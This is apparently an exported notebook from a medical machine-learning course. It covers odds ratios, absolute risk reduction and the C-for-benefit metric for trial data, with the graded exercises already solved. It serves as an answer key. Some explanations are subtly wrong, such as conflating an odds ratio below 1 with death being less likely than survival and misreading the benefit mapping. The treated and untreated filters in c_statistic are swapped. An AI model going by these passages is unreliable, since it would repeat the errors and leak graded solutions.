# $$logit(p) = \log \left(\frac{p}{1-p} \right)= \theta^T x^{(i)}$$
#
# - "Odds" is defined as the probability of an event divided by the probability of not having the event: $\frac{p}{1-p}$.
#
# - "Log odds", or "logit" function, is the natural log of the odds: $log \left(\frac{p}{1-p} \right)$
# In this example, $x^{(i)}_{TRTMT}$ is the treatment variable. Therefore, $\theta_{TRTMT}$ tells you what the effect of treatment is. If $\theta_{TRTMT}$ is negative, then having treatment reduces the log-odds of death, which means death is less likely than if you did not have treatment.
#
# Note that this assumes a constant relative treatment effect, since the impact of treatment does not depend on any other covariates.
#
# Typically, a randomized control trial (RCT) will seek to establish a negative $\theta_{TRTMT}$ (because the treatment is intended to reduce risk of death), which corresponds to an odds ratio of less than 1.
#
# An odds ratio of less than one implies the probability of death is less than the probability of surviving.
#
# $$ \frac{p}{1-p} < 1 \rightarrow p < 1-p$$
#
# Run the next cell to fit your logistic regression model.
#
# You can use the entire dev set (and do not need to reserve a separate validation set) because there is no need for hyperparameter tuning using a validation set.
# In[17]:
from sklearn.linear_model import LogisticRegression
lr = LogisticRegression(penalty='l2',solver='lbfgs', max_iter=10000).fit(X_dev, y_dev)
# ### Calculating the Odds ratio
#
# You are interested in finding the odds for treatment relative to the odds for the baseline.
#
# $$ OddsRatio = \frac{Odds_{treatment}}{Odds_{baseline}}$$
#
# where
# $$Odds_{treatment} = \frac{p_{treatment}}{1-p_{treatment}}$$
#
# and
#
# $$Odds_{baseline} = \frac{p_{baseline}}{1-p_{baseline}}$$
# If you look at the expression
#
# $$\log \left(\frac{p}{1-p} \right)= \theta^T x^{(i)} = \theta_{treatment} \times x_{treatment}^{(i)} + \theta_{age} \times x_{age}^{(i)} + \cdots$$
#
# Let's just let "$\theta \times x_{age}^{(i)} + \cdots$" stand for all the other thetas and feature variables except for the treatment $\theta_{treatment}^{(i)}$, and $x_{treatment}^{(i)}$ .
# #### Treatment
# To denote that the patient received treatment, we set $x_{treatment}^{(i)} = 1$. Which means the log odds for a treated patient are:
#
# $$ log( Odds_{treatment}) = \log \left(\frac{p_{treatment}}{1-p_{treatment}} \right) = \theta_{treatment} \times 1 + \theta_{age} \times x_{age}^{(i)} + \cdots$$
#
# To get odds from log odds, use exponentiation (raise to the power of e) to take the inverse of the natural log.
#
# $$Odds_{treatment} = e^{log( Odds_{treatment})} = \left(\frac{p_{treatment}}{1-p_{treatment}} \right) = e^{\theta_{treatment} \times 1 + \theta_{age} \times x_{age}^{(i)} + \cdots}$$
# #### Control (baseline)
#
# Similarly, when the patient has no treatment, this is denoted by $x_{treatment}^{(i)} = 0$. So the log odds for the untreated patient is:
#
# $$log(Odds_{baseline}) = \log \left(\frac{p_{baseline}}{1-p_{baseline}} \right) = \theta_{treatment} \times 0 + \theta_{age} \times x_{age}^{(i)} + \cdots$$
#
# $$ = 0 + \theta_{age} \times x_{age}^{(i)} + \cdots$$
#
# To get odds from log odds, use exponentiation (raise to the power of e) to take the inverse of the natural log.
#
# $$Odds_{baseline} = e^{log(Odds_{baseline})} = \left(\frac{p_{baseline}}{1-p_{baseline}} \right) = e^{0 + \theta_{age} \times x_{age}^{(i)} + \cdots}$$
#
# #### Odds Ratio
#
# The Odds ratio is:
#
# $$ OddsRatio = \frac{Odds_{treatment}}{Odds_{baseline}}$$
#
# Doing some substitution:
#
# $$ OddsRatio = \frac{e^{\theta_{treatment} \times 1 + \theta_{age} \times x_{age}^{(i)} + \cdots}}{e^{0 + \theta_{age} \times x_{age}^{(i)} + \cdots}}$$
#
# Notice that $e^{\theta_{age} \times x_{age}^{(i)} + \cdots}$ cancels on top and bottom, so that:
#
# $$ OddsRatio = \frac{e^{\theta_{treatment} \times 1}}{e^{0}}$$
#
# Since $e^{0} = 1$, This simplifies to:
#
# $$ OddsRatio = e^{\theta_{treatment}}$$
# <a name='ex-03'></a>
# ### Exercise 03: Extract the treatment effect
#
# Complete the `extract_treatment_effect` function to extract $\theta_{treatment}$ and then calculate the odds ratio of treatment from the logistic regression model.
# In[18]:
# UNQ_C3 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def extract_treatment_effect(lr, data):
theta_TRTMT = 0.0
TRTMT_OR = 0.0
coeffs = {data.columns[i]:lr.coef_[0][i] for i in range(len(data.columns))}
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# get the treatment coefficient
theta_TRTMT = coeffs['TRTMT']
# calculate the Odds ratio for treatment
TRTMT_OR = np.exp(theta_TRTMT)
### END CODE HERE ###
return theta_TRTMT, TRTMT_OR
# #### Test
# In[19]:
# Test extract_treatment_effect function
theta_TRTMT, trtmt_OR = extract_treatment_effect(lr, X_dev)
print(f"Theta_TRTMT: {theta_TRTMT:.4f}")
print(f"Treatment Odds Ratio: {trtmt_OR:.4f}")
# ### Expected Output
#
# ```CPP
# Theta_TRTMT: -0.2885
# Treatment Odds Ratio: 0.7494
# ```
# Based on this model, it seems that the treatment has a beneficial effect.
# - The $\theta_{treatment} = -0.29$ is a negative value, meaning that it has the effect of reducing risk of death.
# - In the code above, the $OddsRatio$ is stored in the variable `TRTMT_OR`.
# - The $OddsRatio = 0.75$, which is less than 1.
#
#
# You can think of the $OddsRatio$ as a factor that is multiplied to the baseline odds $Odds_{baseline}$ in order to estimate the $Odds_{treatment}$. You can think about the Odds Ratio as a rate, converting between baseline odds and treatment odds.
#
# $$Odds_{treatment} = OddsRatio \times Odds_{baseline}$$
#
# In this case:
#
# $$Odds_{treatment} = 0.75 \times Odds_{baseline}$$
#
# So you can interpret this to mean that the treatment reduces the odds of death by $(1 - OddsRatio) = 1 - 0.75 = 0.25$, or about 25%.
#
# You will see how well this model fits the data in the next few sections.
# <a name="2-2"></a>
# ### 2.2 Absolute Risk Reduction
# <a name='ex-04'></a>
# ### Exercise 4: Calculate ARR
#
# A valuable quantity is the absolute risk reduction (ARR) of a treatment. If $p$ is the baseline probability of death, and $p_{treatment}$ is the probability of death if treated, then
# $$ARR = p_{baseline} - p_{treatment} $$
#
# In the case of logistic regression, here is how ARR can be computed:
# Recall that the Odds Ratio is defined as:
#
# $$OR = Odds_{treatment} / Odds_{baseline}$$
#
# where the "odds" is the probability of the event over the probability of not having the event, or $p/(1-p)$.
#
# $$Odds_{trtmt} = \frac{p_{treatment}}{1- p_{treatment}}$$
# and
# $$Odds_{baseline} = \frac{p_{baseline}}{1- p_{baseline}}$$
#
# In the function below, compute the predicted absolute risk reduction (ARR) given
# - the odds ratio for treatment "$OR$", and
# - the baseline risk of an individual $p_{baseline}$
#
# If you get stuck, try reviewing the level 1 hints by clicking on the cell "Hints Level 1". If you would like more help, please try viewing "Hints Level 2".
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Hints Level 1</b></font>
# </summary>
# <p>
# <ul>
# <li> Using the given $p$, compute the baseline odds of death.</li>
# <li> Then, use the Odds Ratio to convert that to odds of death given treatment.</li>
# <li> Finally, convert those odds back into a probability</li>
# </ul>
# </p>
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Hints Level 2</b></font>
# </summary>
# <p>
# <ul>
# <li> Solve for p_treatment starting with this expression: Odds_treatment = p_treatment / (1 - p_treatment). You may want to do this on a piece of paper.</li>
# </ul>
# </p>
# In[20]:
# UNQ_C4 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def OR_to_ARR(p, OR):
"""
Compute ARR for treatment for individuals given
baseline risk and odds ratio of treatment.
Args:
p (float): baseline probability of risk (without treatment)
OR (float): odds ratio of treatment versus baseline
Returns:
ARR (float): absolute risk reduction for treatment
"""
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# compute baseline odds from p
odds_baseline = p/(1-p)
# compute odds of treatment using odds ratio
odds_trtmt = OR*odds_baseline
# compute new probability of death from treatment odds
p_trtmt = odds_trtmt/(1+odds_trtmt)
# compute ARR using treated probability and baseline probability
ARR = p-p_trtmt
### END CODE HERE ###
return ARR
# **Test Case**
# In[21]:
print("TEST CASES")
test_p, test_OR = (0.75, 0.5)
print(f"baseline p: {test_p}, OR: {test_OR}")
print(f"Output: {OR_to_ARR(test_p, test_OR):.4f}, Expected: {0.15}\n")
test_p, test_OR = (0.04, 1.2)
print(f"baseline p: {test_p}, OR: {test_OR}")
print(f"Output: {OR_to_ARR(test_p, test_OR):.4f}, Expected: {-0.0076}")
# #### Visualize the treatment effect as baseline risk varies
#
# The logistic regression model assumes that treatment has a constant effect in terms of odds ratio and is independent of other covariates.
#
# However, this does not mean that absolute risk reduction is necessarily constant for any baseline risk $\hat{p}$. To illustrate this, we can plot absolute risk reduction as a function of baseline predicted risk $\hat{p}$.
#
# Run the next cell to see the relationship between ARR and baseline risk for the logistic regression model.
# In[22]:
ps = np.arange(0.001, 0.999, 0.001)
diffs = [OR_to_ARR(p, trtmt_OR) for p in ps]
plt.plot(ps, diffs)
plt.title("Absolute Risk Reduction for Constant Treatment OR")
plt.xlabel('Baseline Risk')
plt.ylabel('Absolute Risk Reduction')
plt.show()
# Note that when viewed on an absolute scale, the treatment effect is not constant, despite the fact that you used a model with no interactions between the features (we didn't multiply two features together).
#
# As shown in the plot, when the baseline risk is either very low (close to zero) or very high (close to one), the Absolute Risk Reduction from treatment is fairly low. When the baseline risk is closer to 0.5 the ARR of treatment is higher (closer to 0.10).
#
# It is always important to remember that baseline risk has a natural effect on absolute risk reduction.
# <a name="2-3"></a>
# ### 2.3 Model Limitations
#
# We can now plot how closely the empirical (actual) risk reduction matches the risk reduction that is predicted by the logistic regression model.
#
# This is complicated by the fact that for each patient, we only observe one outcome (treatment or no treatment).
# - We can't give a patient treatment, then go back in time and measure an alternative scenario where the same patient did not receive the treatment.
# - Therefore, we will group patients into groups based on their baseline risk as predicted by the model, and then plot their empirical ARR within groups that have similar baseline risks.
# - The empirical ARR is the death rate of the untreated patients in that group minus the death rate of the treated patients in that group.
#
# $$ARR_{empirical} = p_{baseline} - p_{treatment}$$
# <a name='ex-05'></a>
# ### Exercise 5: Baseline Risk
# In the next cell, write a function to compute the baseline risk of each patient using the logistic regression model.
#
# The baseline risk is the model's predicted probability that the patient is predicted to die if they do not receive treatment.
#
# You will later use the baseline risk of each patient to organize patients into risk groups (that have similar baseline risks). This will allow you to calculate the ARR within each risk group.
#
# $$p_{baseline} = logisticRegression(Treatment = False, Age = age_{i}, Obstruct = obstruct_{i}, \cdots)$$
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Hints</b></font>
# </summary>
# <p>
# <ul>
# <li> A patient receives treatment if their feature x_treatment is True, and does not receive treatment when their x_treatment is False.</li>
# <li>For a patient who actually did receive treatment, you can ask the model to predict their risk without receiving treatment by setting the patient's x_treatment to False.</li>
# <li>The logistic regression predict_proba() function returns a 2D array, one row for each patient, and one column for each possible outcome (each class). In this case, the two outcomes are either no death (0), or death (1). To find out which column contains the probability for death, check the order of the classes by using lr.classes_ </li>
# </ul>
# </p>
# In[25]:
# UNQ_C5 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def base_risks(X, lr_model):
"""
Compute baseline risks for each individual in X.
Args:
X (dataframe): data from trial. 'TRTMT' column
is 1 if subject retrieved treatment, 0 otherwise
lr_model (model): logistic regression model
Returns:
risks (np.array): array of predicted baseline risk
for each subject in X
"""
# first make a copy of the dataframe so as not to overwrite the original
X = X.copy(deep=True)
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# Set the treatment variable to assume that the patient did not receive treatment
X.TRTMT = False
# Input the features into the model, and predict the probability of death.
risks = lr_model.predict_proba(X)[:,1]
# END CODE HERE
return risks
# **Test Case**
# In[26]:
example_df = pd.DataFrame(columns = X_dev.columns)
example_df.loc[0, :] = X_dev.loc[X_dev.TRTMT == 1, :].iloc[0, :]
example_df.loc[1, :] = example_df.iloc[0, :]
example_df.loc[1, 'TRTMT'] = 0
print("TEST CASE")
print(example_df)
print(example_df.loc[:, ['TRTMT']])
print('\n')
print("Base risks for both rows should be the same")
print(f"Baseline Risks: {base_risks(example_df.copy(deep=True), lr)}")
# #### Expected output
#
# ```CPP
# Base risks for both rows should be the same
# Baseline Risks: [0.43115868 0.43115868]
# ```
# <a name='ex-06'></a>
# ### Exercise 6: ARR by quantile
#
# Since the effect of treatment varies depending on the baseline risk, it makes more sense to group patients who have similar baseline risks, and then look at the outcomes of those who receive treatment versus those who do not, to estimate the absolute risk reduction (ARR).
#
# You'll now implement the `lr_ARR_quantile` function to plot empirical average ARR for each quantile of base risk.
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Hints</b></font>
# </summary>
# <p>
# <ul>
# <li>Use pandas.cut to define intervals of bins of equal size. For example, pd.cut(arr,5) uses the values in the list or array 'arr' and returns the intervals of 5 bins.</li>
# <li>Use pandas.DataFrame.groupby to group by a selected column of the dataframe. Then select the desired variable and apply an aggregator function. For example, df.groupby('col1')['col2'].sum() groups by column 1, and then calculates the sum of column 2 for each group. </li>
# </ul>
# </p>
#
# In[27]:
# UNQ_C6 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def lr_ARR_quantile(X, y, lr):
# first make a deep copy of the features dataframe to calculate the base risks
X = X.copy(deep=True)
# Make another deep copy of the features dataframe to store baseline risk, risk_group, and y
df = X.copy(deep=True)
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# Calculate the baseline risks (use the function that you just implemented)
baseline_risk = base_risks(df.copy(deep=True), lr)
# bin patients into 10 risk groups based on their baseline risks
risk_groups = pd.cut(baseline_risk,10)
# Store the baseline risk, risk_groups, and y into the new dataframe
df.loc[:, 'baseline_risk'] = baseline_risk
df.loc[:, 'risk_group'] = risk_groups
df.loc[:, 'y'] = y_dev
# select the subset of patients who did not actually receive treatment
df_baseline = df[df.TRTMT==False]
# select the subset of patients who did actually receive treatment
df_treatment = df[df.TRTMT==True]
# For baseline patients, group them by risk group, select their outcome 'y', and take the mean
baseline_mean_by_risk_group = df_baseline.groupby('risk_group')['y'].mean()
# For treatment patients, group them by risk group, select their outcome 'y', and take the mean
treatment_mean_by_risk_group = df_treatment.groupby('risk_group')['y'].mean()
# Calculate the absolute risk reduction by risk group (baseline minus treatment)
arr_by_risk_group = baseline_mean_by_risk_group - treatment_mean_by_risk_group
# Set the index of the arr_by_risk_group dataframe to the average baseline risk of each risk group
# Use data for all patients to calculate the average baseline risk, grouped by risk group.
arr_by_risk_group.index = df.groupby('risk_group')['baseline_risk'].mean()
### END CODE HERE ###
# Set the name of the Series to 'ARR'
arr_by_risk_group.name = 'ARR'
return arr_by_risk_group
# In[28]:
# Test
abs_risks = lr_ARR_quantile(X_dev, y_dev, lr)
# print the Series
print(abs_risks)
# just showing this as a Dataframe for easier viewing
display(pd.DataFrame(abs_risks))
# ##### Expected output
# ```CPP
# baseline_risk
# 0.231595 0.089744
# 0.314713 0.042857
# 0.386342 -0.014604
# 0.458883 0.122222
# 0.530568 0.142857
# 0.626937 -0.104072
# 0.693404 0.150000
# 0.777353 0.293706
# 0.836617 0.083333
# 0.918884 0.200000
# Name: ARR, dtype: float64
# ```
# Plot the ARR grouped by baseline risk
# In[29]:
plt.scatter(abs_risks.index, abs_risks, label='empirical ARR')
plt.title("Empirical Absolute Risk Reduction vs. Baseline Risk")
plt.ylabel("Absolute Risk Reduction")
plt.xlabel("Baseline Risk Range")
ps = np.arange(abs_risks.index[0]-0.05, abs_risks.index[-1]+0.05, 0.01)
diffs = [OR_to_ARR(p, trtmt_OR) for p in ps]
plt.plot(ps, diffs, label='predicted ARR')
plt.legend(loc='upper right')
plt.show()
# In the plot, the empirical absolute risk reduction is shown as circles, whereas the predicted risk reduction from the logistic regression model is given by the solid line.
#
# If ARR depended only on baseline risk, then if we plotted actual (empirical) ARR grouped by baseline risk, then it would follow the model's predictions closely (the dots would be near the line in most cases).
#
# However, you can see that the empirical absolute risk reduction (shown as circles) does not match the predicted risk reduction from the logistic regression model (given by the solid line).
#
# This may indicate that ARR may depend on more than simply the baseline risk.
# <a name="3"></a>
# ## 3 Evaluation Metric
# <a name="3-1"></a>
# ### 3.1 C-statistic-for-benefit (C-for-benefit)
#
# You'll now use a measure to evaluate the discriminative power of your models for predicting ARR. Ideally, you could use something like the regular Concordance index (also called C-statistic) from Course 2. Proceeding by analogy, you'd like to estimate something like:
#
# $$P(A \text{ has higher predicted ARR than } B| A \text{ experienced a greater risk reduction than } B).$$
#
# #### The ideal data cannot be observed
#
# The fundamental problem is that for each person, you can only observe either their treatment outcome or their baseline outcome.
# - The patient either receives the treatment, or does not receive the treatment. You can't go back in time to have the same patient undergo treatment and then not have treatment.
# - This means that you can't determine what their actual risk reduction was.
# #### Estimate the treated/untreated patient using a pair of patients
#
# What you will do instead is match people across treatment and control arms based on predicted ARR.
# - Now, in each pair, you'll observe both outcomes, so you'll have an estimate of the true treatment effect.
# - In the pair of patients (A,B),
# - Patient A receives the treatment
# - Patient B does not receive the treatment.
# - Think of the pair of patients as a substitute for the the ideal data that has the same exact patient in both the treatment and control group.
# #### The C-for-benefit
#
# $$P(\text{$P_1$ has a predicted ARR greater than $P_2$} | \text{$P_1$ experiences greater risk reduction than $P_2$}),$$
#
# - Pair 1 consists of two patients (A,B), where A receives treatment, B does not.
# - Pair 2 is another pair of two patients (A,B), where A receives treatment, B does not.
#
# The risk reduction for each pair is:
# - 1 if the treated person A survives and the untreated B person does not (treatment helps).
# - -1 if the treated person A dies and the untreated person B doesn't (treatment harms)
# - 0 otherwise (treatment has no effect, because both patients in the pair live, or both die).
# #### Details for calculating C-for-benefit
#
# The c-for-benefit gives you a way to evaluate the ability of models to discriminate between patient profiles which are likely to experience greater benefit from treatment.
# - If you are better able to predict how likely a treatment can improve a patient's outcome, you can help the doctor and patient make a more informed decision when deciding whether to undergo treatment, considering the possible side-effects and other risks associated with treatment.
#
# Please complete the implementation of the C-statistic-for-benefit below.
#
# The code to create the pairs is given to you.
# ```CPP
# obs_benefit_dict = {
# (0, 0): 0,
# (0, 1): -1,
# (1, 0): 1,
# (1, 1): 0,
# }
# ```
# Here is the interpretation of this dictionary for a pair of patients, (A,B), where A receives treatment and B does not:
# - When patient A does not die, and neither does patient B, `(0, 0)`, the observed benefit of treatment is 0.
# - When patient A does not die, but patient B does die, `(0, 1)`, the observed benefit is -1 (the treatment helped).
# - When patient A dies, but patient B does not die, `(1, 0)`, the observed benefit is 1 (the treatment was harmful)
# - When patient A dies and patient B dies, `(0, 0)`, the observed benefit of treatment is 0.
#
# Each patient in the pair is represented by a tuple `(ARR, y)`.
# - Index 0 contains the predicted ARR, which is the predicted benefit from treatment.
# - Index 1 contains the actual patient outcome: 0 for no death, 1 for death.
#
# So a pair of patients is represented as a tuple containing two tuples:
#
# For example, Pair_1 is `( (ARR_1_A, y_1_A),(ARR_1_B, y_1_B))`, and the data may look like:
# `( (0.60, 0),(0.40, 1))`.
# - This means that patient A (who received treatment) has a predicted benefit of 0.60 and does not die.
# - Patient B (who did not receive treatment) has a predicted benefit of 0.40 and dies.
# <a name='ex-07'></a>
# ### Exercise 7: Calculate c for benefit score
# In `c_for_benefit_score`, you will compute the C-for-benefit given the matched pairs.
#
# $$\text{c for benefit score} = \frac{concordant + 0.5 \times risk\_ties}{permissible}$$
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Click here for Hints!</b></font>
# </summary>
# <p>
# <ul>
# <li>A pair of patients in this case are two patients whose data are used to represent a single patient.</li>
# <li> A pair of pairs is similar to what you think of as just a "pair" in the course 2 concordance index. It's a pair of pairs of patients (four patients total).</li>
# <li>Each patient is represented by a tuple of two values. The first value is the predicted risk reduction, and the second is the patient's outcome.</li>
# <li>observed benefit: for each patient pair, the first patient is assumed to be the one who received treatment, and second in the pair is the one who did not receive treatment. Observed benefit is either 0 (no effect), -1 (treatment helped), 1 (treatment harmed)</li>
# <li>predicted benefit: for each patient pair, take the mean of the two predicted benefits. This is the first value in each patient's tuple.</li>
# <li>permissible pair of pairs: observed benefit is different between the two pairs of pairs of patients.</li>
# <li>concordant pair: the observed benefit and predicted benefit of pair 1 are both less than those for pair 2; or, the observed and predicted benefit of pair 1 are both greater than those for pair 2. Also, it should be a permissible pair of pairs.</li>
# <li>Risk tie: the predicted benefits of both pairs are equal, and it's also a permissible pair of pairs.</li>
# </ul>
# </p>
#
# In[30]:
# UNQ_C7 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def c_for_benefit_score(pairs):
"""
Compute c-statistic-for-benefit given list of
individuals matched across treatment and control arms.
Args:
pairs (list of tuples): each element of the list is a tuple of individuals,
the first from the control arm and the second from
the treatment arm. Each individual
p = (pred_outcome, actual_outcome) is a tuple of
their predicted outcome and actual outcome.
Result:
cstat (float): c-statistic-for-benefit computed from pairs.
"""
# mapping pair outcomes to benefit
obs_benefit_dict = {
(0, 0): 0,
(0, 1): -1,
(1, 0): 1,
(1, 1): 0,
}
### START CODE HERE (REPLACE INSTANCES OF 'None', 'False', and 'pass' with your code) ###
# compute observed benefit for each pair
obs_benefit = [obs_benefit_dict[(i[1],j[1])] for (i,j) in pairs]
# compute average predicted benefit for each pair
pred_benefit = [np.mean([i[0],j[0]]) for (i,j) in pairs]
concordant_count, permissible_count, risk_tie_count = 0, 0, 0
# iterate over pairs of pairs
for i in range(len(pairs)):
for j in range(i + 1, len(pairs)):
# if the observed benefit is different, increment permissible count
if obs_benefit[i] != obs_benefit[j]:
# increment count of permissible pairs
permissible_count = permissible_count + 1
# if concordant, increment count
concordance= ((pred_benefit[i]>pred_benefit[j] and obs_benefit[i]>obs_benefit[j]) or (pred_benefit[i]<pred_benefit[j] and obs_benefit[i]<obs_benefit[j]))
if (concordance): # change to check for concordance
concordant_count = concordant_count + 1
# if risk tie, increment count
if (pred_benefit[i]==pred_benefit[j]): #change to check for risk ties
risk_tie_count = risk_tie_count + 1
# compute c-statistic-for-benefit
cstat = (concordant_count + (0.5 * risk_tie_count)) / permissible_count
# END CODE HERE
return cstat
# **Test Case**
# In[31]:
print("TEST CASE")
tmp_pairs = [((0.64, 1), (0.54, 0)),
((0.44, 0),(0.40, 1)),
((0.56, 1), (0.74, 0)),
((0.22,0),(0.22,1)),
((0.22,1),(0.22,0))]
print(f"pairs: {tmp_pairs}")
tmp_cstat = c_for_benefit_score(tmp_pairs)
print(f"Output: {tmp_cstat:.4f}")
# ##### Expected Output
#
# ```CPP
# TEST CASE
# pairs: [((0.64, 1), (0.54, 0)), ((0.44, 0), (0.4, 1)), ((0.56, 1), (0.74, 0)), ((0.22, 0), (0.22, 1)), ((0.22, 1), (0.22, 0))]
# Output: 0.7500
# ```
# <a name='ex-08'></a>
# ### Exercise 8: Create patient pairs and calculate c-for-benefit
#
# You will implement the function `c_statistic`, which prepares the patient data and uses the c-for-benefit score function to calculate the c-for-benefit:
#
# - Take as input:
# - The predicted risk reduction `pred_rr` (ARR)
# - outcomes `y` (1 for death, 0 for no death)
# - treatments `w` (1 for treatment, 0 for no treatment)
# - Collect the predicted risk reduction, outcomes and treatments into tuples, one tuple for each patient.
# - Filter one list of tuples where patients did not receive treatment.
# - Filter another list of tuples where patients received treatment.
#
# - Make sure that there is one treated patient for each untreated patient.
# - If there are fewer treated patients, randomly sample a subset of untreated patients, one for each treated patient.
# - If there are fewer untreated patients, randomly sample a subset of treated patients, one for each untreated patient.
#
# - Sort treated patients by their predicted risk reduction, and similarly sort the untreated patients by predicted risk reduction.
# - This allows you to match the treated patient with the highest predicted risk reduction with the untreated patient with the highest predicted risk reduction. Similarly, the second highest treated patient is matched with the second highest untreated patient.
#
# - Create pairs of treated and untreated patients.
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Hints</b></font>
# </summary>
# <p>
# <ul>
# <li> Use zip(a,b,c) to create tuples from two or more lists of equal length, and use list(zip(a,b,c)) to store that as a list data type.</li>
# <li> Use filter(lambda x: x[0] == True, some_list) to filter a list (such as a list of tuples) so that the 0th item in each tuple is equal to True. Cast the result as a list using list(filter(lambda x: x[0] == True, some_list)) </li>
# <li>Use random.sample(some_list, sub_sample_length) to sample a subset from a list without replacement.</li>
# <li>Use sorted(some_list, key=lambda x: x[1]) to sort a list of tuples by their value in index 1.</li>
# </ul>
# </p>
#
# In[32]:
# UNQ_C8 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def c_statistic(pred_rr, y, w, random_seed=0):
"""
Return concordance-for-benefit, the proportion of all matched pairs with
unequal observed benefit, in which the patient pair receiving greater
treatment benefit was predicted to do so.
Args:
pred_rr (array): array of predicted risk reductions
y (array): array of true outcomes
w (array): array of true treatments
Returns:
cstat (float): calculated c-stat-for-benefit
"""
assert len(pred_rr) == len(w) == len(y)
random.seed(random_seed)
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# Collect pred_rr, y, and w into tuples for each patient
tuples = list(zip(pred_rr,y,w))
# Collect untreated patient tuples, stored as a list
untreated = list(filter(lambda x:x[2]==True, tuples))
# Collect treated patient tuples, stored as a list
treated = list(filter(lambda x:x[2]==False, tuples))
# randomly subsample to ensure every person is matched
# if there are more untreated than treated patients,
# randomly choose a subset of untreated patients, one for each treated patient.
if len(treated) < len(untreated):
untreated = random.sample(untreated,k=len(treated))
# if there are more treated than untreated patients,
# randomly choose a subset of treated patients, one for each treated patient.
if len(untreated) < len(treated):
treated = random.sample(treated,k=len(untreated))
assert len(untreated) == len(treated)
# Sort the untreated patients by their predicted risk reduction
untreated = sorted(untreated,key=lambda x:x[0])
# Sort the treated patients by their predicted risk reduction
treated = sorted(treated,key=lambda x:x[0])
# match untreated and treated patients to create pairs together
pairs = list(zip(treated,untreated))
# calculate the c-for-benefit using these pairs (use the function that you implemented earlier)
cstat = c_for_benefit_score(pairs)
### END CODE HERE ###
return cstat
# In[33]:
# Test
tmp_pred_rr = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]
tmp_y = [0,1,0,1,0,1,0,1,0]
tmp_w = [0,0,0,0,1,1,1,1,1]
tmp_cstat = c_statistic(tmp_pred_rr, tmp_y, tmp_w)
print(f"C-for-benefit calculated is {tmp_cstat}")
# ##### Expected output
#
# ```CPP
# C-for-benefit calculated is 0.6
# ```
# ### Predicted risk reduction
# In order to compute the c-statistic-for-benefit for any of your models, you need to compute predicted risk reduction from treatment (predicted risk reduction is the input `pred_rr` to the c-statistic function).
#
# - The easiest way to do this in general is to create a version of the data where the treatment variable is False and a version where it is True.
# - Then take the difference $\text{pred_RR} = p_{control} - p_{treatment}$
#
# We've implemented this for you.
# In[34]:
def treatment_control(X):
"""Create treatment and control versions of data"""
X_treatment = X.copy(deep=True)
X_control = X.copy(deep=True)
X_treatment.loc[:, 'TRTMT'] = 1
X_control.loc[:, 'TRTMT'] = 0
return X_treatment, X_control
def risk_reduction(model, data_treatment, data_control):
"""Compute predicted risk reduction for each row in data"""
treatment_risk = model.predict_proba(data_treatment)[:, 1]
control_risk = model.predict_proba(data_control)[:, 1]
return control_risk - treatment_risk
# Now let's compute the predicted risk reductions of the logistic regression model on the test set.
# In[35]:
X_test_treated, X_test_untreated = treatment_control(X_test)
rr_lr = risk_reduction(lr, X_test_treated, X_test_untreated)
# Before we evaluate the c-statistic-for-benefit, let's look at a histogram of predicted ARR.
# In[36]:
plt.hist(rr_lr, bins='auto')
plt.title("Histogram of Predicted ARR using logistic regression")
plt.ylabel("count of patients")
plt.xlabel("ARR")
plt.show()
# Note that although it predicts different absolute risk reduction, it never predicts that the treatment will adversely impact risk. This is because the odds ratio of treatment is less than 1, so the model always predicts a decrease in the baseline risk. Run the next cell to compute the c-statistic-for-benefit on the test data.
# In[37]:
tmp_cstat_test = c_statistic(rr_lr, y_test, X_test.TRTMT)
print(f"Logistic Regression evaluated by C-for-Benefit: {tmp_cstat_test:.4f}")
# ##### Expected Output
# ```CPP
# Logistic Regression evaluated by C-for-Benefit: 0.5412
# ```
# Recall that a c statistic ranges from 0 to 1, and is closer to when the model being evaluated is doing a good job with its predictions.
#
# You can see that the model is not doing a great job of predicting risk reduction, given a c-for-benefit of around 0.54.
# ### Regular c-index
# Let's compare this with the regular C-index which you've applied in previous assignments. Note that the regular c-statistic does not look at pairs of pairs of patients, and just compares one patient to another when evaluating the model's performance. So the regular c-index is evaluating the model's ability to predict overall patient risk, not necessarily measuring how well the model predicts benefit from treatment.
# In[38]:
from lifelines.utils import concordance_index
tmp_regular_cindex = concordance_index(y_test, lr.predict_proba(X_test)[:, 1])
print(f"Logistic Regression evaluated by regular C-index: {tmp_regular_cindex:.4f}")
# ##### Expected output
# ```CPP
# Logistic Regression evaluated by regular C-index: 0.7785
# ```
# You can see that even though the model accurately predicts overall risk (regular c-index), it does not necessarily do a great job predicting benefit from treatment (c-for-benefit).
# You can also visually assess the discriminative ability of the model by checking if the people it thinks benefit the most from treatment empirically (actually) experience a benefit.
#
# Since you don't have counterfactual results from individuals, you'll need to aggregate patient information in some way.
#
# You can group patients by deciles (10 groups) of risk.
# In[39]:
def quantile_benefit(X, y, arr_hat):
df = X.copy(deep=True)
df.loc[:, 'y'] = y
df.loc[:, 'benefit'] = arr_hat
benefit_groups = pd.qcut(arr_hat, 10)
df.loc[:, 'benefit_groups'] = benefit_groups
empirical_benefit = df.loc[df.TRTMT == 0, :].groupby('benefit_groups').y.mean() - df.loc[df.TRTMT == 1].groupby('benefit_groups').y.mean()
avg_benefit = df.loc[df.TRTMT == 0, :].y.mean() - df.loc[df.TRTMT==1, :].y.mean()
return empirical_benefit, avg_benefit
def plot_empirical_risk_reduction(emp_benefit, av_benefit, model):
plt.scatter(range(len(emp_benefit)), emp_benefit)
plt.xticks(range(len(emp_benefit)), range(1, len(emp_benefit) + 1))
plt.title("Empirical Risk Reduction vs. Predicted ({})".format(model))
plt.ylabel("Empirical Risk Reduction")
plt.xlabel("Predicted Risk Reduction Quantile")
plt.plot(range(10), [av_benefit]*10, linestyle='--', label='average RR')
